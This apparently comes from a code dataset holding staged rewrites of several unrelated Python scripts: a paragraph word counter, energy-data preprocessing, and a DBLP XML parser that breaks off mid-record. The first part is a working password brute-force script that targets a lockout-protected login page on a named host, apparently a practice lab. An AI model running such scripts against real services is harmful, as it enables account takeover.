"step-3": "<mask token>\nMAX_ROUND = 3\ncurr_round = 0\nsleep_time = 2\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-4": "import argparse\nimport requests\nfrom ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username\nfrom random import choice\nfrom time import sleep\nMAX_ROUND = 3\ncurr_round = 0\nsleep_time = 2\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-5": "import argparse\nimport requests\n\nfrom ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username\n\nfrom random import choice\nfrom time import sleep\n\n\nMAX_ROUND = 3 # 爆破的轮数\ncurr_round = 0 # 当前的轮数\nsleep_time = 2 # 每一轮休眠的秒数\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print(\"[Error] {0}\".format(repr(e)))\n return\n\n username = login_info[0]\n # 如果这个用户名已经被爆破出来密码,那么跳过这个用户名\n if username in success_username:\n return\n\n password = login_info[1]\n # 登录\n payload = {\n \"username\": username,\n \"password\": password,\n }\n print('开始尝试用户名:{},密码:{}'.format(username,password))\n\n # url = \"http://127.0.0.1:8000/user/login-block-account/?referer=/\"\n url = \"http://ss.gentlecp.com:40000/user/login-block-account/?referer=/\"\n r = requests.post(url, data=payload)\n\n # 判断是否登录成功\n if r.status_code == 200:\n msg = login_info\n\n success_str = \"欢迎访问GentleCP的网站\"\n if success_str in r.text:\n # 登录成功则把登录信息保存到success_queue\n success_queue.put(msg)\n # 把登录成功的用户名添加到 success_username中,之后可以跳过这个用户名的密码的爆破\n success_username.append(username)\n print(\"[INFO] success: \", msg)\n\n # 如果想要爆破出来一个密码就立刻停止爆破,那么此处调用函数stop_brute,反之则注释此处\n # stop_brute()\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open(\"dict/{}\".format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n\n count = 0\n for u in username:\n # 每一轮都换下一个密码\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = (u, p)\n dict_queue.put(pair)\n print(\"字典生成完成,长度 {}\".format(count))\n\n\ndef get_parse() -> dict:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--username\", \"-u\", help=\"用户名字典\")\n parser.add_argument(\"--password\", \"-p\", help=\"密码字典\")\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print(\"\\n[INFO] 爆破结果: \", success)\n\n\nif __name__ == \"__main__\":\n args = get_parse()\n dict_username = args.get('dict_username', \"username.txt\")\n dict_password = args.get('dict_password', \"password.txt\")\n\n for curr_round in range(0, MAX_ROUND):\n print(\"[INFO] 开始第{0}轮爆破\".format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print(\"[INFO] Sleep.\")\n sleep(2)\n\n print_result()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
import os
import csv
import re
totWords = 0
wordLen = 0
totSentWithPunctuation = 0
sourceFile = os.path.join('Resources', 'paragraph_2.txt')
with open(sourceFile, 'r') as paragraph:
paragraph = paragraph.read().split("\n\n")
for sentence in paragraph:
# Remove punctuation from sentences
sentWithPunctuation = sentence
sentNoPunctuation = re.sub(r'[^\w\s]','',sentence)
#Split sentence with no punctuation by words using spaces
words = sentNoPunctuation.split(" ")
for word in words:
wordLen = wordLen + len(word)
# Compute totals for output message
totWords = totWords + len(words) # Total words for all sentences
avgSentLen_Words = round(totWords / len(paragraph),2) # Average words for all sentences
avgLetterCount = round(wordLen/totWords,2) # Average letter by word for all sentences
totSentWithPunctuation = totSentWithPunctuation + len(sentWithPunctuation)
avgSentLen_chars = round(totSentWithPunctuation / len(paragraph),2)
#Validate output by printing a test line
# print(f"words: {len(words)} S w Punct. len: {len(sentWithPunctuation)} Sentence: {sentWithPunctuation}")
print(f"\n\nParagraph Analysis of '{sourceFile}' file")
print(f"---------------------------------------------------------")
print(f" Approximate Word Count: {totWords} ")
print(f" Approximate Sentence Count: {len(paragraph)} ")
print(f" Average Letter Count: {avgLetterCount} ")
print(f" Average Sentence Length (words): {avgSentLen_Words} ")
print(f" Average Sentence Length (chars): {avgSentLen_chars} ")
|
normal
|
{
"blob_id": "3cd7abf9659fe1db0ef3aa58df8dd7fd959e10a6",
"index": 386,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(sourceFile, 'r') as paragraph:\n paragraph = paragraph.read().split('\\n\\n')\nfor sentence in paragraph:\n sentWithPunctuation = sentence\n sentNoPunctuation = re.sub('[^\\\\w\\\\s]', '', sentence)\n words = sentNoPunctuation.split(' ')\n for word in words:\n wordLen = wordLen + len(word)\n totWords = totWords + len(words)\n avgSentLen_Words = round(totWords / len(paragraph), 2)\n avgLetterCount = round(wordLen / totWords, 2)\n totSentWithPunctuation = totSentWithPunctuation + len(sentWithPunctuation)\n avgSentLen_chars = round(totSentWithPunctuation / len(paragraph), 2)\nprint(f\"\"\"\n\nParagraph Analysis of '{sourceFile}' file\"\"\")\nprint(f'---------------------------------------------------------')\nprint(f' Approximate Word Count: {totWords} ')\nprint(f' Approximate Sentence Count: {len(paragraph)} ')\nprint(f' Average Letter Count: {avgLetterCount} ')\nprint(f' Average Sentence Length (words): {avgSentLen_Words} ')\nprint(f' Average Sentence Length (chars): {avgSentLen_chars} ')\n",
"step-3": "<mask token>\ntotWords = 0\nwordLen = 0\ntotSentWithPunctuation = 0\nsourceFile = os.path.join('Resources', 'paragraph_2.txt')\nwith open(sourceFile, 'r') as paragraph:\n paragraph = paragraph.read().split('\\n\\n')\nfor sentence in paragraph:\n sentWithPunctuation = sentence\n sentNoPunctuation = re.sub('[^\\\\w\\\\s]', '', sentence)\n words = sentNoPunctuation.split(' ')\n for word in words:\n wordLen = wordLen + len(word)\n totWords = totWords + len(words)\n avgSentLen_Words = round(totWords / len(paragraph), 2)\n avgLetterCount = round(wordLen / totWords, 2)\n totSentWithPunctuation = totSentWithPunctuation + len(sentWithPunctuation)\n avgSentLen_chars = round(totSentWithPunctuation / len(paragraph), 2)\nprint(f\"\"\"\n\nParagraph Analysis of '{sourceFile}' file\"\"\")\nprint(f'---------------------------------------------------------')\nprint(f' Approximate Word Count: {totWords} ')\nprint(f' Approximate Sentence Count: {len(paragraph)} ')\nprint(f' Average Letter Count: {avgLetterCount} ')\nprint(f' Average Sentence Length (words): {avgSentLen_Words} ')\nprint(f' Average Sentence Length (chars): {avgSentLen_chars} ')\n",
"step-4": "import os\nimport csv\nimport re\ntotWords = 0\nwordLen = 0\ntotSentWithPunctuation = 0\nsourceFile = os.path.join('Resources', 'paragraph_2.txt')\nwith open(sourceFile, 'r') as paragraph:\n paragraph = paragraph.read().split('\\n\\n')\nfor sentence in paragraph:\n sentWithPunctuation = sentence\n sentNoPunctuation = re.sub('[^\\\\w\\\\s]', '', sentence)\n words = sentNoPunctuation.split(' ')\n for word in words:\n wordLen = wordLen + len(word)\n totWords = totWords + len(words)\n avgSentLen_Words = round(totWords / len(paragraph), 2)\n avgLetterCount = round(wordLen / totWords, 2)\n totSentWithPunctuation = totSentWithPunctuation + len(sentWithPunctuation)\n avgSentLen_chars = round(totSentWithPunctuation / len(paragraph), 2)\nprint(f\"\"\"\n\nParagraph Analysis of '{sourceFile}' file\"\"\")\nprint(f'---------------------------------------------------------')\nprint(f' Approximate Word Count: {totWords} ')\nprint(f' Approximate Sentence Count: {len(paragraph)} ')\nprint(f' Average Letter Count: {avgLetterCount} ')\nprint(f' Average Sentence Length (words): {avgSentLen_Words} ')\nprint(f' Average Sentence Length (chars): {avgSentLen_chars} ')\n",
"step-5": "import os\nimport csv\nimport re\n\ntotWords = 0\nwordLen = 0\ntotSentWithPunctuation = 0\n\nsourceFile = os.path.join('Resources', 'paragraph_2.txt')\n\nwith open(sourceFile, 'r') as paragraph:\n paragraph = paragraph.read().split(\"\\n\\n\")\n\n\nfor sentence in paragraph:\n # Remove punctuation from sentences\n sentWithPunctuation = sentence\n sentNoPunctuation = re.sub(r'[^\\w\\s]','',sentence)\n\n #Split sentence with no punctuation by words using spaces\n words = sentNoPunctuation.split(\" \")\n for word in words:\n wordLen = wordLen + len(word)\n\n # Compute totals for output message \n totWords = totWords + len(words) # Total words for all sentences\n avgSentLen_Words = round(totWords / len(paragraph),2) # Average words for all sentences\n avgLetterCount = round(wordLen/totWords,2) # Average letter by word for all sentences\n totSentWithPunctuation = totSentWithPunctuation + len(sentWithPunctuation)\n avgSentLen_chars = round(totSentWithPunctuation / len(paragraph),2)\n\n #Validate output by printing a test line\n # print(f\"words: {len(words)} S w Punct. len: {len(sentWithPunctuation)} Sentence: {sentWithPunctuation}\")\n\nprint(f\"\\n\\nParagraph Analysis of '{sourceFile}' file\")\nprint(f\"---------------------------------------------------------\")\nprint(f\" Approximate Word Count: {totWords} \")\nprint(f\" Approximate Sentence Count: {len(paragraph)} \")\nprint(f\" Average Letter Count: {avgLetterCount} \")\nprint(f\" Average Sentence Length (words): {avgSentLen_Words} \")\nprint(f\" Average Sentence Length (chars): {avgSentLen_chars} \")\n\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import pandas as pd
import numpy as np
import matplotlib.pylab as plt
from matplotlib.pylab import rcParams
#from pandas import datetime
#from pandas.tseries.t
from sklearn.preprocessing import MinMaxScaler
#from statsmodels.tsa.seasonal import seasonal_decompose
from pandas import Series
data = pd.read_csv(
r'E:\Thesis Content\ukdale\house_1\channel_7.dat',
delimiter=' ',
header=None,
names=['date', 'KWh'],
dtype={'date': np.int64, 'KWh': np.float64},
index_col='date'
) #initially KWh column contains Ws in 6 second interval, later it will be converted to KWh
data.index = pd.to_datetime((data.index.values), unit='s')
#data.head(5)
#before_process = data
after_process=data
#before_process = before_process.resample('d').sum()
#before_process['KWh'] = round(((before_process.KWh * 6) / (1000 * 3600)) , 3)
#before_process.head(5)
after_process = after_process.drop(after_process[(after_process.KWh < 10) | (after_process.KWh > 4000) ].index)
after_process = after_process.resample('d').sum()
#after_process.head(5)
after_process['KWh'] = round(((after_process.KWh * 6) / (1000 * 3600)) , 3)
after_process.head(5)
after_process.to_csv(path_or_buf=r'E:\Thesis Content\ukdale CSV\Without Noise\Tvday.csv', sep = ',' , index_label = 'date')
#rcParams['figure.figsize'] = 16, 10
#plt.subplot(2, 1, 1)
#plt.scatter(before_process.index ,before_process['KWh'].values, s=10)
#plt.title('Before and After Pre Processing')
#plt.ylabel('KWh')
#plt.subplot(2, 1, 2)
#plt.scatter(after_process.index ,after_process['KWh'].values, s=10)
#plt.xlabel('Date')
#plt.ylabel('KWh')
#plt.show()
|
normal
|
{
"blob_id": "19c0c3156488ce99316ce40f32e84e476b7afdac",
"index": 2754,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nafter_process.head(5)\nafter_process.to_csv(path_or_buf=\n 'E:\\\\Thesis Content\\\\ukdale CSV\\\\Without Noise\\\\Tvday.csv', sep=',',\n index_label='date')\n",
"step-3": "<mask token>\ndata = pd.read_csv('E:\\\\Thesis Content\\\\ukdale\\\\house_1\\\\channel_7.dat',\n delimiter=' ', header=None, names=['date', 'KWh'], dtype={'date': np.\n int64, 'KWh': np.float64}, index_col='date')\ndata.index = pd.to_datetime(data.index.values, unit='s')\nafter_process = data\nafter_process = after_process.drop(after_process[(after_process.KWh < 10) |\n (after_process.KWh > 4000)].index)\nafter_process = after_process.resample('d').sum()\nafter_process['KWh'] = round(after_process.KWh * 6 / (1000 * 3600), 3)\nafter_process.head(5)\nafter_process.to_csv(path_or_buf=\n 'E:\\\\Thesis Content\\\\ukdale CSV\\\\Without Noise\\\\Tvday.csv', sep=',',\n index_label='date')\n",
"step-4": "import pandas as pd\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom matplotlib.pylab import rcParams\nfrom sklearn.preprocessing import MinMaxScaler\nfrom pandas import Series\ndata = pd.read_csv('E:\\\\Thesis Content\\\\ukdale\\\\house_1\\\\channel_7.dat',\n delimiter=' ', header=None, names=['date', 'KWh'], dtype={'date': np.\n int64, 'KWh': np.float64}, index_col='date')\ndata.index = pd.to_datetime(data.index.values, unit='s')\nafter_process = data\nafter_process = after_process.drop(after_process[(after_process.KWh < 10) |\n (after_process.KWh > 4000)].index)\nafter_process = after_process.resample('d').sum()\nafter_process['KWh'] = round(after_process.KWh * 6 / (1000 * 3600), 3)\nafter_process.head(5)\nafter_process.to_csv(path_or_buf=\n 'E:\\\\Thesis Content\\\\ukdale CSV\\\\Without Noise\\\\Tvday.csv', sep=',',\n index_label='date')\n",
"step-5": "import pandas as pd\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom matplotlib.pylab import rcParams\n#from pandas import datetime\n#from pandas.tseries.t\nfrom sklearn.preprocessing import MinMaxScaler\n#from statsmodels.tsa.seasonal import seasonal_decompose\nfrom pandas import Series\n\ndata = pd.read_csv(\n r'E:\\Thesis Content\\ukdale\\house_1\\channel_7.dat',\n delimiter=' ',\n header=None,\n names=['date', 'KWh'],\n dtype={'date': np.int64, 'KWh': np.float64},\n index_col='date'\n ) #initially KWh column contains Ws in 6 second interval, later it will be converted to KWh\n\ndata.index = pd.to_datetime((data.index.values), unit='s')\n#data.head(5)\n#before_process = data\nafter_process=data\n#before_process = before_process.resample('d').sum()\n#before_process['KWh'] = round(((before_process.KWh * 6) / (1000 * 3600)) , 3)\n#before_process.head(5)\nafter_process = after_process.drop(after_process[(after_process.KWh < 10) | (after_process.KWh > 4000) ].index)\nafter_process = after_process.resample('d').sum()\n#after_process.head(5)\nafter_process['KWh'] = round(((after_process.KWh * 6) / (1000 * 3600)) , 3)\nafter_process.head(5)\n\nafter_process.to_csv(path_or_buf=r'E:\\Thesis Content\\ukdale CSV\\Without Noise\\Tvday.csv', sep = ',' , index_label = 'date')\n\n\n#rcParams['figure.figsize'] = 16, 10\n#plt.subplot(2, 1, 1)\n#plt.scatter(before_process.index ,before_process['KWh'].values, s=10)\n#plt.title('Before and After Pre Processing')\n#plt.ylabel('KWh')\n#plt.subplot(2, 1, 2)\n#plt.scatter(after_process.index ,after_process['KWh'].values, s=10)\n#plt.xlabel('Date')\n#plt.ylabel('KWh')\n#plt.show()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import xml.etree.ElementTree as ET
from collections import OrderedDict
import json
import threading
class MyThread(threading.Thread):
def __init__(self, filenum):
threading.Thread.__init__(self)
self.filenum = filenum
print('Inicio del thread:', str(self.filenum))
def run(self):
parser = ET.XMLParser(encoding='ISO-8859-1')
parser.entity["agrave"] = 'à'
parser.entity["uuml"] = 'ü'
parser.entity["Eacute"] = 'É'
parser.entity["eacute"] = 'é'
parser.entity["aacute"] = 'á'
parser.entity["iacute"] = 'í'
parser.entity["ouml"] = 'ö'
parser.entity["ccedil"] = 'ç'
parser.entity["egrave"] = 'è'
parser.entity["auml"] = 'ä'
parser.entity["uacute"] = 'ú'
parser.entity["aring"] = 'å'
parser.entity["oacute"] = 'ó'
parser.entity["szlig"] = 'ß'
parser.entity["oslash"] = 'ø'
parser.entity["yacute"] = 'ỳ'
parser.entity["iuml"] = 'ï'
parser.entity["igrave"] = 'í'
parser.entity["ocirc"] = 'ô'
parser.entity["icirc"] = 'î'
parser.entity["Uuml"] = 'Ü'
parser.entity["euml"] = 'ë'
parser.entity["acirc"] = 'â'
parser.entity["atilde"] = 'ã'
parser.entity["Uacute"] = 'Ù'
parser.entity["Aacute"] = 'À'
parser.entity["ntilde"] = 'ñ'
parser.entity["Auml"] = 'Ä'
parser.entity["Oslash"] = 'Ø'
parser.entity["Ccedil"] = 'Ç'
parser.entity["otilde"] = 'õ'
parser.entity["ecirc"] = 'ê'
parser.entity["times"] = '×'
parser.entity["Ouml"] = 'Ö'
parser.entity["reg"] = '®'
parser.entity["Aring"] = 'Å'
parser.entity["Oacute"] = 'Ò'
parser.entity["ograve"] = 'ó'
parser.entity["yuml"] = 'ÿ'
parser.entity["eth"] = 'ð'
parser.entity["aelig"] = 'æ'
parser.entity["AElig"] = 'Æ'
parser.entity["Agrave"] = 'Á'
parser.entity["Iuml"] = 'Ï'
parser.entity["micro"] = 'µ'
parser.entity["Acirc"] = 'Â'
parser.entity["Otilde"] = 'Õ'
parser.entity["Egrave"] = 'É'
parser.entity["ETH"] = 'Ð'
parser.entity["ugrave"] = 'ú'
parser.entity["ucirc"] = 'û'
parser.entity["thorn"] = 'þ'
parser.entity["THORN"] = 'Þ'
parser.entity["Iacute"] = 'Ì'
parser.entity["Icirc"] = 'Î'
parser.entity["Ntilde"] = 'Ñ'
parser.entity["Ecirc"] = 'Ê'
parser.entity["Ocirc"] = 'Ô'
parser.entity["Ograve"] = 'Ó'
parser.entity["Igrave"] = 'Í'
parser.entity["Atilde"] = 'Ã'
parser.entity["Yacute"] = 'Ỳ'
parser.entity["Ucirc"] = 'Û'
parser.entity["Euml"] = 'Ë'
xml_file = '../../../data/dblp.' + str(self.filenum) + '.xml'
e = ET.parse(xml_file, parser=parser).getroot()
tot_docs = len(e)
doc_number = 0
mitad = False
max_mitad = False
complete = False
d = OrderedDict()
docs = ['article', 'inproceedings', 'incollection']
tags = ['author', 'year', 'title']
# Borrado previo del fichero de resultados
with open('../../../data/result' + str(self.filenum) +'.txt', 'w') as out:
out.writelines('')
# Almacenamiento de valores en dicc para volcado posterior a json
for child1 in e:
if ((doc_number / tot_docs > 0.5) & (not mitad)):
print('50% de los documentos procesados en el thread',str(self.filenum))
mitad = True
if ((doc_number / tot_docs > 0.9) & (not max_mitad)):
print('90% de los documentos procesados en el thread',str(self.filenum))
max_mitad = True
if ((doc_number / tot_docs == 1.0) & (not complete)):
print('100% de los documentos procesados en el thread',str(self.filenum))
complete = True
if (child1.tag in docs):
d['Type'] = child1.tag
d['Authors'] = []
for child2 in child1:
if (child2.tag in tags):
if (child2.tag == 'author'):
dicc_aut = dict()
dicc_aut["Nombre"] = child2.text
d['Authors'].append(dicc_aut)
elif child2.tag == "title":
d["Title"] = child2.text
elif child2.tag == "year":
d["Year"] = child2.text
out.writelines(json.dumps(d) + '\n')
doc_number += 1
out.close()
for i in range(7):
MyThread(i).start()
|
normal
|
{
"blob_id": "9150eb53d309e75299775cd9524a688e8dc2ff76",
"index": 4210,
"step-1": "<mask token>\n\n\nclass MyThread(threading.Thread):\n\n def __init__(self, filenum):\n threading.Thread.__init__(self)\n self.filenum = filenum\n print('Inicio del thread:', str(self.filenum))\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MyThread(threading.Thread):\n\n def __init__(self, filenum):\n threading.Thread.__init__(self)\n self.filenum = filenum\n print('Inicio del thread:', str(self.filenum))\n\n def run(self):\n parser = ET.XMLParser(encoding='ISO-8859-1')\n parser.entity['agrave'] = 'à'\n parser.entity['uuml'] = 'ü'\n parser.entity['Eacute'] = 'É'\n parser.entity['eacute'] = 'é'\n parser.entity['aacute'] = 'á'\n parser.entity['iacute'] = 'í'\n parser.entity['ouml'] = 'ö'\n parser.entity['ccedil'] = 'ç'\n parser.entity['egrave'] = 'è'\n parser.entity['auml'] = 'ä'\n parser.entity['uacute'] = 'ú'\n parser.entity['aring'] = 'å'\n parser.entity['oacute'] = 'ó'\n parser.entity['szlig'] = 'ß'\n parser.entity['oslash'] = 'ø'\n parser.entity['yacute'] = 'ỳ'\n parser.entity['iuml'] = 'ï'\n parser.entity['igrave'] = 'í'\n parser.entity['ocirc'] = 'ô'\n parser.entity['icirc'] = 'î'\n parser.entity['Uuml'] = 'Ü'\n parser.entity['euml'] = 'ë'\n parser.entity['acirc'] = 'â'\n parser.entity['atilde'] = 'ã'\n parser.entity['Uacute'] = 'Ù'\n parser.entity['Aacute'] = 'À'\n parser.entity['ntilde'] = 'ñ'\n parser.entity['Auml'] = 'Ä'\n parser.entity['Oslash'] = 'Ø'\n parser.entity['Ccedil'] = 'Ç'\n parser.entity['otilde'] = 'õ'\n parser.entity['ecirc'] = 'ê'\n parser.entity['times'] = '×'\n parser.entity['Ouml'] = 'Ö'\n parser.entity['reg'] = '®'\n parser.entity['Aring'] = 'Å'\n parser.entity['Oacute'] = 'Ò'\n parser.entity['ograve'] = 'ó'\n parser.entity['yuml'] = 'ÿ'\n parser.entity['eth'] = 'ð'\n parser.entity['aelig'] = 'æ'\n parser.entity['AElig'] = 'Æ'\n parser.entity['Agrave'] = 'Á'\n parser.entity['Iuml'] = 'Ï'\n parser.entity['micro'] = 'µ'\n parser.entity['Acirc'] = 'Â'\n parser.entity['Otilde'] = 'Õ'\n parser.entity['Egrave'] = 'É'\n parser.entity['ETH'] = 'Ð'\n parser.entity['ugrave'] = 'ú'\n parser.entity['ucirc'] = 'û'\n parser.entity['thorn'] = 'þ'\n parser.entity['THORN'] = 'Þ'\n parser.entity['Iacute'] = 'Ì'\n parser.entity['Icirc'] = 'Î'\n parser.entity['Ntilde'] = 'Ñ'\n parser.entity['Ecirc'] = 'Ê'\n parser.entity['Ocirc'] = 'Ô'\n parser.entity['Ograve'] = 'Ó'\n parser.entity['Igrave'] = 'Í'\n parser.entity['Atilde'] = 'Ã'\n parser.entity['Yacute'] = 'Ỳ'\n parser.entity['Ucirc'] = 'Û'\n parser.entity['Euml'] = 'Ë'\n xml_file = '../../../data/dblp.' + str(self.filenum) + '.xml'\n e = ET.parse(xml_file, parser=parser).getroot()\n tot_docs = len(e)\n doc_number = 0\n mitad = False\n max_mitad = False\n complete = False\n d = OrderedDict()\n docs = ['article', 'inproceedings', 'incollection']\n tags = ['author', 'year', 'title']\n with open('../../../data/result' + str(self.filenum) + '.txt', 'w'\n ) as out:\n out.writelines('')\n for child1 in e:\n if (doc_number / tot_docs > 0.5) & (not mitad):\n print('50% de los documentos procesados en el thread',\n str(self.filenum))\n mitad = True\n if (doc_number / tot_docs > 0.9) & (not max_mitad):\n print('90% de los documentos procesados en el thread',\n str(self.filenum))\n max_mitad = True\n if (doc_number / tot_docs == 1.0) & (not complete):\n print('100% de los documentos procesados en el thread',\n str(self.filenum))\n complete = True\n if child1.tag in docs:\n d['Type'] = child1.tag\n d['Authors'] = []\n for child2 in child1:\n if child2.tag in tags:\n if child2.tag == 'author':\n dicc_aut = dict()\n dicc_aut['Nombre'] = child2.text\n d['Authors'].append(dicc_aut)\n elif child2.tag == 'title':\n d['Title'] = child2.text\n elif child2.tag == 'year':\n d['Year'] = child2.text\n out.writelines(json.dumps(d) + '\\n')\n doc_number += 1\n out.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass MyThread(threading.Thread):\n\n def __init__(self, filenum):\n threading.Thread.__init__(self)\n self.filenum = filenum\n print('Inicio del thread:', str(self.filenum))\n\n def run(self):\n parser = ET.XMLParser(encoding='ISO-8859-1')\n parser.entity['agrave'] = 'à'\n parser.entity['uuml'] = 'ü'\n parser.entity['Eacute'] = 'É'\n parser.entity['eacute'] = 'é'\n parser.entity['aacute'] = 'á'\n parser.entity['iacute'] = 'í'\n parser.entity['ouml'] = 'ö'\n parser.entity['ccedil'] = 'ç'\n parser.entity['egrave'] = 'è'\n parser.entity['auml'] = 'ä'\n parser.entity['uacute'] = 'ú'\n parser.entity['aring'] = 'å'\n parser.entity['oacute'] = 'ó'\n parser.entity['szlig'] = 'ß'\n parser.entity['oslash'] = 'ø'\n parser.entity['yacute'] = 'ỳ'\n parser.entity['iuml'] = 'ï'\n parser.entity['igrave'] = 'í'\n parser.entity['ocirc'] = 'ô'\n parser.entity['icirc'] = 'î'\n parser.entity['Uuml'] = 'Ü'\n parser.entity['euml'] = 'ë'\n parser.entity['acirc'] = 'â'\n parser.entity['atilde'] = 'ã'\n parser.entity['Uacute'] = 'Ù'\n parser.entity['Aacute'] = 'À'\n parser.entity['ntilde'] = 'ñ'\n parser.entity['Auml'] = 'Ä'\n parser.entity['Oslash'] = 'Ø'\n parser.entity['Ccedil'] = 'Ç'\n parser.entity['otilde'] = 'õ'\n parser.entity['ecirc'] = 'ê'\n parser.entity['times'] = '×'\n parser.entity['Ouml'] = 'Ö'\n parser.entity['reg'] = '®'\n parser.entity['Aring'] = 'Å'\n parser.entity['Oacute'] = 'Ò'\n parser.entity['ograve'] = 'ó'\n parser.entity['yuml'] = 'ÿ'\n parser.entity['eth'] = 'ð'\n parser.entity['aelig'] = 'æ'\n parser.entity['AElig'] = 'Æ'\n parser.entity['Agrave'] = 'Á'\n parser.entity['Iuml'] = 'Ï'\n parser.entity['micro'] = 'µ'\n parser.entity['Acirc'] = 'Â'\n parser.entity['Otilde'] = 'Õ'\n parser.entity['Egrave'] = 'É'\n parser.entity['ETH'] = 'Ð'\n parser.entity['ugrave'] = 'ú'\n parser.entity['ucirc'] = 'û'\n parser.entity['thorn'] = 'þ'\n parser.entity['THORN'] = 'Þ'\n parser.entity['Iacute'] = 'Ì'\n parser.entity['Icirc'] = 'Î'\n parser.entity['Ntilde'] = 'Ñ'\n parser.entity['Ecirc'] = 'Ê'\n parser.entity['Ocirc'] = 'Ô'\n parser.entity['Ograve'] = 'Ó'\n parser.entity['Igrave'] = 'Í'\n parser.entity['Atilde'] = 'Ã'\n parser.entity['Yacute'] = 'Ỳ'\n parser.entity['Ucirc'] = 'Û'\n parser.entity['Euml'] = 'Ë'\n xml_file = '../../../data/dblp.' + str(self.filenum) + '.xml'\n e = ET.parse(xml_file, parser=parser).getroot()\n tot_docs = len(e)\n doc_number = 0\n mitad = False\n max_mitad = False\n complete = False\n d = OrderedDict()\n docs = ['article', 'inproceedings', 'incollection']\n tags = ['author', 'year', 'title']\n with open('../../../data/result' + str(self.filenum) + '.txt', 'w'\n ) as out:\n out.writelines('')\n for child1 in e:\n if (doc_number / tot_docs > 0.5) & (not mitad):\n print('50% de los documentos procesados en el thread',\n str(self.filenum))\n mitad = True\n if (doc_number / tot_docs > 0.9) & (not max_mitad):\n print('90% de los documentos procesados en el 